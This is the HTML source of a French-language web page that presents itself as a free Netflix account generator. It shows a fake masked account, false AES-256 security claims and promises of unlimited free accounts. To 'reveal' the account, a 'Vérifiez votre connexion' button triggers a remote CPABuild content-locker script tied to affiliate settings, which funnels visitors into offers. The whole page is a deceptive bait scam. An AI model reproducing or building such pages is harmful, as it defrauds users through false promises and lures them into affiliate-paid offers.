<!DOCTYPE html>
<html lang="fr-FR">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-153132085-1"></script>
<script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}gtag('js',new Date());gtag('config','UA-153132085-1');</script>

<link rel="shortcut icon" href="img/favicon.png"/>
   <meta charset="UTF-8"/>
   <title>Netflix gratuit</title>
  
 
   <meta name="description" content="Obtenez Netflix gratuit à vie en moins de 5 minutes, générateur de comptes netflix gratuitement en 2020"/>
   <meta name="keywords" content="netflix gratuit, netflix premium gratuit, netflix gratuit en 2020, comment avoir netflix gratuit"/>
   <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/>
<link rel="canonical" href="index.html" />
<meta property="og:locale" content="fr_FR" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Netflix gratuit" />
<meta property="og:description" content="Obtenez Netflix gratuit à vie en moins de 5 minutes, netflix gratuitement en 2020" />
<meta property="og:url" content="index.html" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
   <meta http-equiv="X-UA-Compatible" content="ie=edge"/>
   <link rel="stylesheet" href="css/_bower.css"/>
   <link rel="stylesheet" href="css/maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
   <link rel="stylesheet" href="css/style.css"/>
   <!-- Font Family -->
   <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
   
  
 
</head>


 
 
<body style="
    background-image: url(img/bg.jpg);
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;"
    >
    <div style="background-color: rgb(1,1,1,0.6)">
   <div class="popup-modal">
      <div class="overlay"></div>
      <div class="white-box" id="loading-modal">
         <h4 class="heading">En traitement...</h4>
         <div class="progress">
            <div class="progress-bar progress-bar-success" id="progress-bar" role="progressbar" aria-valuenow="60" aria-valuemin="0" aria-valuemax="100" style="width: 0%"></div>
         </div>
         <p><i class="fa fa-expeditedssl"></i> AES-256 Encryption.</p>
      </div>
      <div class="white-box" id="account-modal">
         <h4 class="heading">Votre compte Netflix</h4>
         <p class="sub" style="font-size: 1.2em;
    color: black;
    font-family: 'Poppins';">Vous trouverez ci-dessous votre nouveau compte netflix généré.</p>
         <div class="account-details">
            <p class="info"><span class="title">Email</span> <span id="username">D*****@***.com</span></p>
            <p class="info"><span class="title">Mot de passe</span> <span id="password">a******s</span></p>
         </div>
         <p style="font-size: 1.0em;
    color: black;
    font-family: 'Poppins';">En raison de la forte demande, nous demandons à tous les utilisateurs de vérifier leur connexion avant de pouvoir révéler les informations de compte. <br> 
         Veuillez cliquer sur le bouton ci-dessous pour démarrer les processus.
         </p>
          <button class="btn1" onclick="CPABuildLock()" >Vérifiez votre connexion</button>
         <div data-captcha-enable="true"></div>
      </div>
   </div>
   <header>
      <div class="container">
         <div class="row">
            <div class="col-md-12">
                
            <a href="https://free-netflix.site" title="" rel="home">
					 <img class="top-logo" src="img/top-logo.png" alt=""/>
				</a>    
               
               
               <h1 class="Typewriter">Générateur de compte Netflix</h1>
               <button class="green-btn" id="generate-btn">Générer un compte</button>
            </div>
         </div>
      </div>
   </header>
   <div id="features">
      <div class="container">
         <div class="row">
            <div class="col-md-4">
               <div class="feature">
                  <i class="fa fa-expeditedssl"></i>
                  <h4>Sécurise</h4>
                  <p>Notre système utilise la technologie de cryptage la plus avancée pour communiquer avec des serveurs externes (AES-256). Par conséquent, vous n'avez pas à vous inquiéter car personne ne saura que vous avez utilisé notre système.</p>
               </div>
            </div>
            <div class="col-md-4">
               <div class="feature">
                  <i class="fa fa-thumbs-up"></i>
                  <h4>Comptes quotidiens</h4>
                  <p>Nous avons mis à jour quotidiennement notre base de données de comptes pour nous assurer qu'elle est toujours remplie de nouveaux comptes. Nous distribuons environ 100 comptes de netflix par jour.</p>
               </div>
            </div>
            <div class="col-md-4">
               <div class="feature">
                  <i class="fa fa-tag"></i>
                  <h4>Gratuit pour toujours</h4>
                  <p>Notre service sera toujours gratuit pour vous. Nous vous fournirons des comptes netflix gratuits illimités sans que vous ayez à payer un seul centime!</p>
               </div>
            </div>
         </div>
      </div>
   </div>
   <footer>
      <div class="container">
         <div class="row">
            <div class="col-md-12">
               <p>&copy; Copyright 2021. Tous droits réservés.</p>
            </div>
         </div>
      </div>
   </footer>
   
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":1660304,"key":"56ebb"};
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/75fa03c.js"></script>
   
   <script type="text/javascript" src="js/_bower.js"></script><script type="text/javascript" src="css/cdnjs.cloudflare.com/ajax/libs/chance/1.0.4/chance.min.js"></script><script type="text/javascript" src="js/scripts.js"></script>
</div>
</body>
